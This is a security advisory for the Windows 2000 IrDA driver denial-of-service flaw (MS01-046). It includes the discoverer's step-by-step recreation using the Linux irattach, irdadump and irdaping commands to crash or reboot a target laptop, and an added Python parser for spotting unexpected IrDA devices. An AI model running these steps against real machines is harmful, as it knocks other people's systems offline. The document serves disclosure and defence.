Reported August 21, 2001, by Microsoft.

VERSION AFFECTED

· Windows 2000

DESCRIPTION
An unchecked buffer exists in the Infrared Data Association (IrDA) driver that can cause a Denial of Service (DoS) condition. A system running Win2K with infrared support turned on can crash when it receives an IrDA test frame from a Linux system that is using the irdaping utility.

DEMONSTRATION

Paul Millar, who discovered the vulnerability, posted the following scenario as a proof of concept:

Recreate:

  1. Start up the laptops. My setup was: victim running Windows, protagonist
     running GNU/Linux. The Linux kernel must have IrDA support
     compiled in.
  2. Under GNU/Linux, make sure irda-utils-0.9.10-9 is installed; other
     versions are untested, but will probably work too.
  3. Do "irattach /dev/ttyS1 -s" or equivalent to activate the IrDA
     port.
  4. Check the GNU/Linux side is working correctly by running the
     "irdadump" command. You should see repetitive output similar to:

07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)
07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)
07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)
07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)
07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)
07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)
07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 [ Computer ] (28)

  5. Place the laptops so the infrared ports are aligned and within IrDA
     distance; irdadump should reflect the new machine. The Windows
     machine should also respond, usually by making a sound.
  6. Run irdaping. The destination address ("0x4d274896"
     for the above example) is required, but the actual value doesn't matter.

The vulnerable system at this point will either crash with a blue screen or will reboot, depending upon the system’s configuration.
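The irdadump output from step 4 also gives a defender a cheap way to inventory which IrDA devices are announcing themselves within range of a monitoring host, which is how step 5 expects the Windows machine to show up. The parser below is an added example written for this page, not code from the advisory, Microsoft or the irda-utils project; it assumes the XID line layout shown above, and the second device address (0badc0de) and its nickname are constructed values.

```python
import re
from typing import Dict, List, Optional

# Layout of the irdadump discovery (XID) lines shown above; the trailing
# "nickname hint=NNNN [ hints ]" part only appears on the final-slot (s=*) frame.
_XID_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+(?P<frame>xid:(?:cmd|rsp))\s+"
    r"(?P<src>[0-9a-f]{8})\s+>\s+(?P<dst>[0-9a-f]{8})\s+"
    r"S=(?P<slots>\d+)\s+s=(?P<slot>\d+|\*)"
    r"(?:\s+(?P<nick>\S+)\s+hint=(?P<hint>[0-9a-f]+)\s+\[(?P<hints>[^\]]*)\])?"
    r"\s+\((?P<size>\d+)\)$"
)

def parse_xid_line(line: str) -> Optional[dict]:
    """Return a dict for one irdadump XID line, or None for anything else."""
    m = _XID_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["slots"], d["size"] = int(d["slots"]), int(d["size"])
    d["hints"] = d["hints"].split() if d["hints"] else []
    return d

def peer_inventory(lines: List[str]) -> Dict[str, dict]:
    """Map each source address to its frame count and, once the s=* frame has
    been seen, the nickname and service hints it announced."""
    inv: Dict[str, dict] = {}
    for line in lines:
        rec = parse_xid_line(line)
        if rec is None:
            continue  # skip non-XID output
        entry = inv.setdefault(rec["src"], {"nick": None, "hints": [], "frames": 0})
        entry["frames"] += 1
        if rec["nick"]:
            entry["nick"], entry["hints"] = rec["nick"], rec["hints"]
    return inv

def unexpected_peers(lines: List[str], allowed: set) -> List[str]:
    """Addresses that announced themselves but are not on the allow-list: a hit
    means an unknown device is within IrDA range of the monitoring host."""
    return sorted(a for a in peer_inventory(lines) if a not in allowed)

# Constructed sample: advisory lines plus one from an invented second device (0badc0de).
SAMPLE = [
    "07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)",
    "07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)",
    "07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 [ Computer ] (28)",
    "07:28:19.000000 xid:cmd 0badc0de > ffffffff S=6 s=* unknown-box hint=0400 [ Computer ] (27)",
]
```

Feeding live `irdadump` output through `unexpected_peers` with the addresses of your own devices as the allow-list flags any other device that comes within IrDA range, which is useful while unpatched Windows 2000 hosts with infrared enabled are still on the floor.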

VENDOR RESPONSE

The vendor, Microsoft, has released security bulletin MS01-046 to address this vulnerability and recommends that affected users apply the patch mentioned in the bulletin.

CREDIT
Discovered by Paul Millar.